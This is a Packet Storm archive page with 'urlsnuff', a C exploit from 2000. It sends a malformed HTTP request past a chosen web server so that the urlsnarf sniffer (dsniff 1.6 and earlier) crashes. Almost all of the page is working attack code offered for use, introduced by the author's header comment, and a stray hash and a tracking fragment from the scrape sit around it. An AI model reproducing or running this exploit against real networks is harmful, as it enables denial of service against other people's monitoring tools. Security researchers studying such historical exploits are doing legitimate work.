Urlsnuff is a urlsniff dos attack. If urlsniff sees this malformed combination of HTTP Requests.
4899b441032bc837dfa3f7eb710e22b3ebaa52024993606408fe14da05fc4ae3/*
* public release date: 03/16/2000
*
* "They're after me Lucky Charmz" - Happy Irish Day [3/17/2000]
* so i'm celebrating the day before too... uNF =P
*
* urlsnuff - stupid remote urlsnarf dos attack (works on dsniff <=1.6)
* by obecian <obecian@celerity.bartoli.org>
*
* notes: i decided to look at dugsongs code and was playing with urlsnarf
* and noticed something amusing -- yeah so it's lame - it's still effective
* urlsnarf will die if it sees this malformed combination of HTTP Requests
* i'm sure there's other combinations, but i'm out of time, and i discovered
* this completely on accident
*
* greetz: cripto, bind, ph1x, quakemstr, curq, kgbud, arethusa ssh irc krew,
* openbsd core team (you guys kick ass!), and everyone else i forgot
*
*/
#define TITLE "urlsnuff - urlsnarf snuffer (works on dsniff <= 1.6)"
#define CODER "(c) 2000 obecian <obecian@celerity.bartoli.org>"
#include <stdio.h>
#include <strings.h>
#include <stdlib.h>
#include <netdb.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
void usage(char *);
int
main(int argc, char **argv)
{
int numbytes;
int sock;
struct sockaddr_in sin;
struct hostent *he;
char buffsnuff[1024];
char *webserver;
if (argc < 2) {usage(argv[0]); exit(1);}
webserver = argv[1];
if ((he = gethostbyname(webserver)) == NULL)
{herror("gethostbyname"); exit(1);}
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{perror("socket"); exit(1);}
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sin.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(sin.sin_zero), 8);
printf("connecting to arbitrary webserver...\n");
if (connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)
{perror("connect"); exit(1);}
printf("throwing amusement =*)\n");
/* we send a legitimate prefix so urlsnarf deals with it, but then we take
advantage and give it an inappropriate suffix and BARF - we see our
friend mr. segfault */
snprintf(buffsnuff, sizeof(buffsnuff), "Referer: http://celerity.bartoli.org\r\n\r\n");
if ((write(sock, &buffsnuff, sizeof(buffsnuff)))<0) {perror("write");
exit(1);}
printf("urlsnarf seg request thrown... sniffer be gone\n\n");
close(sock);
exit(0);
}
void
usage(char *arg)
{
putchar('\n'); puts(TITLE); puts(CODER); putchar('\n');
printf("usage: %s <arbitrary webserver>\n", arg);
return;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed